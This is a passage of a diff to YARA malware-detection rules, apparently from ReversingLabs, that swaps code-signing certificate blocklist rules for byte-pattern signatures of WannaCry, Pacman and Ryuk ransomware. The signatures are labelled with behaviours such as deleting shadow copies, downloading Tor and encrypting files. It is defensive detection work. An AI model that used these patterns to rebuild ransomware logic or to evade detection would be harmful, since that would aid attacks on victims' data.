+            ?? ?? ?? 80 3D ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? 66 89 45 ?? B9 ?? ?? ?? ?? B8 ?? ?? ??
+            ?? 0F 45 C1 8D 4D ?? 89 45 ?? 8B 45 ?? 68 ?? ?? ?? ?? 8B 00 8B 70 ?? E8 ?? ?? ?? ??
+            C7 45 ?? ?? ?? ?? ?? 8B 00 85 C0 74 ?? 8B 00 EB ?? 33 C0 8D 4D ?? 51 6A ?? 50 FF 75
+            ?? FF D6 C7 45 ?? ?? ?? ?? ?? 83 CF ?? 8B 75 ?? 89 45 ?? 85 F6 74 ?? 8B CF F0 0F C1
+            4E ?? 49 75 ?? 85 F6 74 ?? 8B 06 85 C0 74 ?? 50 FF 15 ?? ?? ?? ?? C7 06 ?? ?? ?? ??
+            8B 46 ?? 85 C0 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 46 ?? ?? ?? ?? ?? 6A ?? 56 E8 ??
+            ?? ?? ?? 83 C4 ?? 8B 1D ?? ?? ?? ?? 8D 45 ?? 50 FF D3 83 7D ?? ?? 0F 8C ?? ?? ?? ??
+        }
+		$delete_shadow_copies_p2 = {
+            8B 45 ?? 8D 4D ?? C7 45 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 00 8B 70 ?? 8B 45 ?? 89 45
+            ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 00 85 C0 74 ?? 8B 00 EB ?? 33 C0 8D 4D ??
+            51 FF 75 ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 50 FF 75 ?? FF D6 C7 45 ?? ?? ?? ?? ?? 8B
+            75 ?? 89 45 ?? 85 F6 74 ?? 8B CF F0 0F C1 4E ?? 49 75 ?? 85 F6 74 ?? 8B 06 85 C0 74
+            ?? 50 FF 15 ?? ?? ?? ?? C7 06 ?? ?? ?? ?? 8B 46 ?? 85 C0 74 ?? 50 E8 ?? ?? ?? ?? 83
+            C4 ?? C7 46 ?? ?? ?? ?? ?? 6A ?? 56 E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? 85 C0 78 ?? 6A
+            ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 8B 45 ?? 79
+            ?? 8B 08 50 FF 51 ?? 8B 45 ?? 50 8B 08 FF 51 ?? FF 15 ?? ?? ?? ?? 33 C0 E9 ?? ?? ??
+            ?? C7 45 ?? ?? ?? ?? ?? 8D 4D ?? 8B 00 68 ?? ?? ?? ?? 8B 40 ?? 89 45 ?? E8 ?? ?? ??
+            ?? C7 45 ?? ?? ?? ?? ?? 8B 30 85 F6 74 ?? 8B 36 EB ?? 33 F6 68 ?? ?? ?? ?? 8D 4D ??
+            E8 ?? ?? ?? ?? C6 45 ?? ?? 8B 00 85 C0 74 ?? 8B 00 EB ?? 33 C0 8D 4D ?? 51 6A ?? 6A
+            ?? 56 50 FF 75 ?? FF 55 ?? 8B 75 ?? 89 45 ?? 85 F6 74 ?? 8B CF F0 0F C1 4E ?? 49 75
+            ?? 85 F6 74 ?? 8B 06 85 C0 74 ?? 50 FF 15 ?? ?? ?? ?? C7 06 ?? ?? ?? ?? 8B 46 ?? 85
+            C0 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 46 ?? ?? ?? ?? ?? 6A ?? 56 E8 ?? ?? ?? ?? 83
+        }
+		$delete_shadow_copies_p3 = {
+            C4 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 75 ?? 85 F6 74 ?? F0 0F C1 7E ??
+            4F 75 ?? 85 F6 74 ?? 8B 06 85 C0 74 ?? 50 FF 15 ?? ?? ?? ?? C7 06 ?? ?? ?? ?? 8B 46
+            ?? 85 C0 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 46 ?? ?? ?? ?? ?? 6A ?? 56 E8 ?? ?? ??
+            ?? 83 C4 ?? 83 7D ?? ?? 7D ?? 8B 45 ?? 50 8B 08 FF 51 ?? 8B 45 ?? E9 ?? ?? ?? ?? 8B
+            4D ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 85 C9 74 ?? 8B 01 8D 55 ?? 52 8D 55
+            ?? 52 6A ?? 6A ?? 51 FF 50 ?? 83 7D ?? ?? 74 ?? 8B 4D ?? 8D 55 ?? 6A ?? 6A ?? 52 8B
+            01 6A ?? 68 ?? ?? ?? ?? 51 FF 50 ?? 85 C0 78 ?? 8B 4D ?? 6A ?? 6A ?? 6A ?? FF 75 ??
+            8B 01 51 FF 50 ?? 85 C0 78 ?? FF 75 ?? 68 ?? ?? ?? ?? EB ?? 50 68 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 83 C4 ?? 8D 45 ?? 50 FF D3 8B 45 ?? 50 8B 08 FF 51 ?? 8B 4D ?? 85 C9 75 ??
+            8B 4D ?? 85 C9 74 ?? 8B 01 51 FF 50 ?? 8B 45 ?? 50 8B 08 FF 51 ?? 8B 45 ?? 50 8B 08
+            FF 51 ?? 8B 45 ?? 8B 08 50 FF 51 ?? FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? 8B 4D ?? 64 89
+            0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Digital Capital Management Ireland Limited" and ( pe.signatures [ i ] . serial == "00:da:df:44:e4:04:63:72:31:3e:e9:7b:8e:39:4c:40:79" or pe.signatures [ i ] . serial == "da:df:44:e4:04:63:72:31:3e:e9:7b:8e:39:4c:40:79" ) and 1600244736 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $write_console_log_p* ) ) and ( all of ( $get_system_information_p* ) ) and ( all of ( $everything_library_setup_p* ) ) and ( all of ( $delete_shadow_copies_p* ) )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_F8C2E08438Bb0E9Adc955E4B493E5821 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Wannacry : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects WannaCry ransomware."
 		author = "ReversingLabs"
-		id = "65297530-2482-5773-8914-461fb56cb41d"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "61734d47-2525-5e3a-94b4-60493dfe2b93"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L5138-L5156"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "5dbe554032c945c46ffd61ef1e0deb59d396a70dd63994bf44c65d849ec8220a"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.WannaCry.yara#L3-L135"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "fed58b533a9f7c3eb1b3e4f8fbe1f519aab94d1c066ae6937c21876693be0eac"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "WannaCry"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$main_1 = {
+            A0 ?? ?? ?? ?? 56 57 6A ?? 88 85 ?? ?? ?? ?? 59 33 C0 8D BD ?? ?? ?? ?? F3 AB 66 AB
+            AA 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 53 FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8D 85
+            ?? ?? ?? ?? 6A ?? 50 FF D6 59 85 C0 59 74 ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 FF D6 59 88
+            18 59 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 59 59
+            8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 53 53 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 5F 5E 85
+            C0 74 ?? 8D 45 ?? 8D 8D ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 89 5D
+        }
+		$main_2 = {
+            68 ?? ?? ?? ?? 33 DB 50 53 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 FF 15
+            ?? ?? ?? ?? 83 38 ?? 75 ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 00 FF 70 ?? E8 ?? ??
+            ?? ?? 59 85 C0 59 75 ?? 53 E8 ?? ?? ?? ?? 85 C0 59 74 ?? BE ?? ?? ?? ?? 53 8D 85 ??
+            ?? ?? ?? 56 50 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 83 F8 ?? 74 ?? E8 ?? ?? ?? ??
+            85 C0 0F 85 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 FF D6 59 85 C0
+            59 74 ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 FF D6 59 88 18 59 8D 85 ?? ?? ?? ?? 50 FF 15 ??
+            ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            53 53 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 53 68 ?? ?? ?? ?? E8
+        }
+		$main_3 = {
+            83 EC ?? 56 57 B9 ?? ?? ?? ?? BE ?? ?? ?? ?? 8D 7C 24 ?? 33 C0 F3 A5 A4 89 44 24 ??
+            89 44 24 ?? 89 44 24 ?? 89 44 24 ?? 89 44 24 ?? 66 89 44 24 ?? 50 50 50 6A ?? 50 88
+            44 24 ?? FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 8D 4C 24 ?? 8B F0 6A ?? 51 56
+            FF 15 ?? ?? ?? ?? 8B F8 56 8B 35 ?? ?? ?? ?? 85 FF 75 ?? FF D6 6A ?? FF D6 E8
+        }
+		$start_service_3 = {
+            83 EC ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83
+            38 ?? 7D ?? E8 ?? ?? ?? ?? 83 C4 ?? C3 57 68 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ??
+            ?? 8B F8 85 FF 74 ?? 53 56 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 8B 1D
+            ?? ?? ?? ?? 8B F0 85 F6 74 ?? 6A ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 56 FF D3 57 FF D3 5E
+            5B 8D 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 50 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ??
+            ?? ?? C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 5F 83 C4 ?? C3
+        }
+		$main_4 = {
+            83 EC ?? 57 68 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F8 85 FF 74 ?? 53 56 68
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8B F0 85 F6 74 ??
+            6A ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 56 FF D3 57 FF D3 5E 5B 8D 44 24 ?? C7 44 24 ?? ??
+            ?? ?? ?? 50 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ??
+            FF 15 ?? ?? ?? ?? 33 C0 5F 83 C4 ?? C2
+        }
+		$main_5 = {
+            68 ?? ?? ?? ?? 50 53 FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50
+            FF D6 59 85 C0 59 74 ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 FF D6 59 88 18 59 8D 85 ?? ?? ??
+            ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 59 59 8D 8D ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 53 53 53 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 5F 5E 85 C0 74 ?? 8D 45 ?? 8D
+            8D ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 89 5D ?? E8 ?? ?? ?? ?? 3B C3 74 ?? FF 75 ?? 50 E8
+            ?? ?? ?? ?? 59 3B C3 59 74 ?? 68 ?? ?? ?? ?? 50 E8
+        }
+		$main_6 = {
+            FF 74 24 ?? FF 74 24 ?? FF 74 24 ?? FF 74 24 ?? E8 ?? ?? ?? ?? C2
+        }
+		$set_reg_key_6 = {
+            68 ?? ?? ?? ?? F3 AB 66 AB AA 8D 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 50 FF 15 ?? ?? ??
+            ?? 8B 2D ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 83 C4 ?? 33 FF 89 7C 24 ?? 85 FF 75 ?? 8D 4C
+            24 ?? 8D 54 24 ?? 51 52 68 ?? ?? ?? ?? EB ?? 8D 44 24 ?? 8D 4C 24 ?? 50 51 68 ?? ??
+            ?? ?? FF 15 ?? ?? ?? ?? 8B 44 24 ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 85
+            C9 74 ?? 8D 94 24 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? FF D5 8D BC 24 ?? ?? ?? ?? 83 C9 ??
+            33 C0 F2 AE F7 D1 8D 84 24 ?? ?? ?? ?? 51 8B 4C 24 ?? 50 6A ?? 6A ?? 68 ?? ?? ?? ??
+            51 FF D3 8B 7C 24 ?? 8B F0 F7 DE 1B F6 46 EB ?? 8D 54 24 ?? 8D 8C 24 ?? ?? ?? ?? 52
+            51 6A ?? 6A ?? 68 ?? ?? ?? ?? 50 C7 44 24 ?? ?? ?? ?? ?? FF 15
+        }
+		$download_tor_6 = {
+            81 EC ?? ?? ?? ?? 53 55 56 57 E8 ?? ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? A0 ?? ?? ?? ??
+            B9 ?? ?? ?? ?? 88 44 24 ?? 33 C0 8D 7C 24 ?? 8B 35 ?? ?? ?? ?? F3 AB 68 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 66 AB 68 ?? ?? ?? ?? 8D 4C 24 ?? 33 ED 68 ?? ?? ?? ?? 51 89 2D ?? ??
+            ?? ?? 89 2D ?? ?? ?? ?? AA FF D6 8B 1D ?? ?? ?? ?? 83 C4 ?? 8D 54 24 ?? 52 FF D3 83
+            F8 ?? 0F 85 ?? ?? ?? ?? 55 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 84
+            C0 75 ?? 5F 5E 5D 5B 81 C4 ?? ?? ?? ?? C3 A0 ?? ?? ?? ?? B9 ?? ?? ?? ?? 88 84 24 ??
+            ?? ?? ?? 33 C0 8D BC 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? F3 AB 66 AB 68 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 AA FF D6 83 C4 ?? 8D 94 24 ?? ?? ??
+            ?? 52 FF D3 83 F8 ?? 75 ?? 5F 5E 5D 32 C0 5B 81 C4 ?? ?? ?? ?? C3
+        }
+		$main_7 = {
+            68 ?? ?? ?? ?? 50 53 FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50
+            FF D6 59 85 C0 59 74 ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 FF D6 59 88 18 59 8D 85 ?? ?? ??
+            ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 59 59 8D 8D ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 53 53 53 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 5F 5E 85 C0 74 ?? 8D 45 ?? 8D
+            8D ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 53 8F 45 ?? E8 ?? ?? ?? ?? 39 44 24 ?? 74 ?? 89 44
+            24 ?? 83 EC ?? 2B C3 58 74 ?? FF 75 ?? 50 E8 ?? ?? ?? ?? 59 89 44 24 ?? 83 EC ?? 2B
+            C3 58 59 74 ?? 68 ?? ?? ?? ?? 50 E8
+        }
+		$main_8 = {
+            68 ?? ?? ?? ?? F3 AB 66 AB AA 8D 44 24 ?? 50 6A ?? FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ??
+            ?? 8D 4C 24 ?? 6A ?? 51 FF D6 83 C4 ?? 85 C0 74 ?? 8D 54 24 ?? 6A ?? 52 FF D6 83 C4
+            ?? C6 00 ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 8C 24
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 5F
+            5E 85 C0 74 ?? 8D 4C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 51 68 ?? ?? ?? ?? 8D 8C 24 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 54 24 ?? 52 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74
+            ?? 68 ?? ?? ?? ?? 50 E8
+        }
+		$entrypoint_all = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ??
+            ?? 83 EC ?? 53 56 57 89 65 ?? 33 DB 89 5D ?? 6A ?? FF 15 ?? ?? ?? ?? 59 83 0D ?? ??
+            ?? ?? ?? 83 0D ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 89 08 FF 15 ?? ??
+            ?? ?? 8B 0D ?? ?? ?? ?? 89 08 A1 ?? ?? ?? ?? 8B 00 A3 ?? ?? ?? ?? E8 ?? ?? ?? ?? 39
+            1D ?? ?? ?? ?? 75 ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 59 E8 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 89 45 ?? 8D 45 ?? 50 FF 35 ?? ?? ??
+            ?? 8D 45 ?? 50 8D 45 ?? 50 8D 45 ?? 50 FF 15
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DocsGen Software Solutions Inc." and ( pe.signatures [ i ] . serial == "00:f8:c2:e0:84:38:bb:0e:9a:dc:95:5e:4b:49:3e:58:21" or pe.signatures [ i ] . serial == "f8:c2:e0:84:38:bb:0e:9a:dc:95:5e:4b:49:3e:58:21" ) and 1599523200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $entrypoint_all at pe.entry_point ) and ( $main_1 or $main_2 or ( $main_3 and $start_service_3 ) or $main_4 or $main_5 or ( $main_6 and ( $set_reg_key_6 or $download_tor_6 ) ) or $main_7 or $main_8 )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_70E1Ebd170Db8102D8C28E58392E5632 : INFO FILE
+rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Pacman : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Pacman ransomware."
 		author = "ReversingLabs"
-		id = "e3b0f68c-8cc9-5275-988a-8d955ea25a47"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "a440769b-030b-5b72-a6f2-cf478dd7acd2"
+		date = "2021-08-12"
+		modified = "2021-08-12"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L5158-L5174"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "e1738eddc1da0876a373ee7f35bff155d56c1b98a23cb117c0e7a966f8fa3c92"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/ByteCode.MSIL.Ransomware.Pacman.yara#L1-L68"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "0634303a4db2631edb40a9435444f3bdc4bc6eb745c7e43a54478e54e7507403"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Pacman"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$pacman_find_encrypted_1 = {
+            28 0A 00 00 06 [0-2] 6F 0D 00 00 06 [0-2] 6F 33 00 00 06 [0-2] 28 FD 01 00 06 [0-2] 28
+            29 02 00 06 1F 1C 28 0E 04 00 06 [0-2] 7E 13 00 00 04 20 0F 03 00 00 28 2F 00 00 06 25
+            26 28 5D 02 00 06 [0-2] 28 6D 01 00 06 [0-2] 0B 07 13 06 16 13 05 2B 31 11 06 11 05 9A
+            0C 28 0A 00 00 06 [0-2] 6F 0D 00 00 06 [0-2] 6F 33 00 00 06 [0-2] 28 FD 01 00 06 [0-2]
+            08 28 55 02 00 06 [0-2] 26 11 05 17 D6 13 05 11 05 11 06 8E B7 32 C7 1D 45 01 00 00 00
+            F6 FF FF FF 17 2D 06 D0 1E 01 00 06 26 16 0A 38 BC 01 00 00 28 0A 00 00 06 [0-2] 6F 0D
+            00 00 06 [0-2] 6F 33 00 00 06 [0-2] 28 FD 01 00 06 [0-2] 06 28 AA 04 00 06 [0-2] 14 20
+            B0 0F 00 00 28 2F 00 00 06 [0-2] 1F 0A 8D 76 00 00 01 13 07 11 07 16 20 BF 0F 00 00 28
+            2F 00 00 06 [0-2] A2 11 07 17 20 C2 0F 00 00 28 2F 00 00 06 [0-2] A2 11 07 18 20 C5 0F
+            00 00 28 2F 00 00 06 [0-2] A2 11 07 19 20 C8 0F 00 00 28 2F 00 00 06 [0-2] A2 11 07 1A
+            20 CB 0F 00 00 28 2F 00 00 06 [0-2] A2 11 07 1B 20 CE 0F 00 00 28 2F 00 00 06 [0-2] A2
+        }
+		$pacman_find_encrypted_2 = {
+            11 07 1C 20 D1 0F 00 00 28 2F 00 00 06 [0-2] A2 11 07 1D 20 D4 0F 00 00 28 2F 00 00 06
+            [0-2] A2 11 07 1E 20 C2 0F 00 00 28 2F 00 00 06 [0-2] A2 11 07 1F 09 20 D7 0F 00 00 28
+            2F 00 00 06 [0-2] A2 11 07 14 14 14 28 7A 04 00 06 [0-2] 28 E2 05 00 06 [0-2] 0D 28 07
+            00 00 06 28 1A 04 00 06 [0-2] 28 0A 00 00 06 [0-2] 6F 0D 00 00 06 [0-2] 6F 33 00 00 06
+            [0-2] 28 FD 01 00 06 [0-2] 06 28 AA 04 00 06 [0-2] 28 E2 05 00 06 [0-2] 28 36 05 00 06
+            [0-2] 2C 78 1A 45 01 00 00 00 F6 FF FF FF 7E 16 00 00 04 28 9D 02 00 06 [0-2] 28 0A 00
+            00 06 [0-2] 6F 0D 00 00 06 [0-2] 6F 33 00 00 06 [0-2] 28 FD 01 00 06 [0-2] 06 28 AA 04
+            00 06 [0-2] 28 E2 05 00 06 [0-2] 09 16 28 23 01 00 06 28 0A 00 00 06 [0-2] 6F 0D 00 00
+            06 [0-2] 6F 33 00 00 06 [0-2] 28 FD 01 00 06 [0-2] 06 28 AA 04 00 06 [0-2] 28 E2 05 00
+            06 [0-2] 28 66 04 00 06 DE 0F 25 28 4E 04 00 06 13 04 28 02 03 00 06 DE 00 06 17 D6 0A
+            06 28 0A 00 00 06 [0-2] 6F 0D 00 00 06 [0-2] 6F 33 00 00 06 [0-2] 28 FD 01 00 06 [0-2]
+            28 E2 04 00 06 [0-2] 3F 1B FE FF FF 1B 45 01 00 00 00 F6 FF FF FF 28 28 00 00 06 2A
+        }
+		$pacman_encrypt = {
+            28 65 02 00 06 [0-2] 0A 16 13 05 20 00 04 00 00 13 07 06 11 07 28 2A 05 00 06 [0-2] 2C
+            19 1C 45 01 00 00 00 F6 FF FF FF 17 2D 06 D0 20 01 00 06 26 11 07 13 05 2B 15 11 07 15
+            D6 13 07 11 07 17 2F D0 17 45 01 00 00 00 F6 FF FF FF 20 DA 0F 00 00 28 2F 00 00 06 [0-2]
+            11 05 28 9D 02 00 06 [0-2] 28 E2 02 00 06 [0-2] 28 6E 03 00 06 06 28 0A 03 00 06 [0-2]
+            0B 14 13 04 14 0D 1F 0E 8D 25 00 00 01 13 0B 11 0B 16 ?? 9C 11 0B 17 ?? 9C 11 0B 18
+            ?? 9C 11 0B 19 ?? 9C 11 0B 1A ?? 9C 11 0B 1B ?? 9C 11 0B 1C ?? 9C 11 0B 1D ?? 9C 11 0B
+            1E 20 ?? ?? ?? ?? 9C 11 0B 1F 09 20 ?? ?? ?? ?? 9C 11 0B 1F 0A 20 ?? ?? ?? ?? 9C 11 0B
+            1F 0B 1F ?? 9C 11 0B 1F 0C 1F ?? 9C 11 0B 1F 0D 1F ?? 9C 11 0B 13 06 02 11 06 11 05 07
+            12 04 12 03 28 1F 01 00 06 05 2C 18 18 45 01 00 00 00 F6 FF FF FF 06 11 04 09 28 96 03
+            00 06 [0-2] 0C 2B 0C 06 11 04 09 28 7E 05 00 06 [0-2] 0C 04 08 17 28 45 01 00 06 [0-2]
+            13 08 20 01 04 00 00 8D 25 00 00 01 13 09 03 11 09 16 20 00 04 00 00 28 3A 03 00 06 [0-2]
+            13 0A 11 0A 16 33 0C 1D 45 01 00 00 00 F6 FF FF FF DE 24 11 08 11 09 16 11 0A 28 F6 04
+            00 06 2B CF 11 08 2C 11 18 45 01 00 00 00 F6 FF FF FF 11 08 28 1E 03 00 06 DC DE 0C 28
+            4E 04 00 06 28 02 03 00 06 DE 00 08 28 1E 03 00 06 2A
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Equal Cash Technologies Limited" and pe.signatures [ i ] . serial == "70:e1:eb:d1:70:db:81:02:d8:c2:8e:58:39:2e:56:32" and 1599264000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $pacman_find_encrypted_1 and $pacman_find_encrypted_2 and $pacman_encrypt )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_09C89De6F64A7Fdf657E69353C5Fdd44 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Ryuk : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Ryuk ransomware."
 		author = "ReversingLabs"
-		id = "f86eafb5-ec59-58c5-b5f9-01a6704fb555"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "179c9277-0bdc-522a-a822-cf93febff408"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L5176-L5192"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "1cb57cd68cda91754307d2e4d94ea011975bbfff0f15134081a5aa11870b0db1"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Ryuk.yara#L1-L199"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "bf93892b281be20917656e242cbb0f3b3694439556b7e5e40a424ba1aa909105"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Ryuk"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$encrypt_files_p1 = {
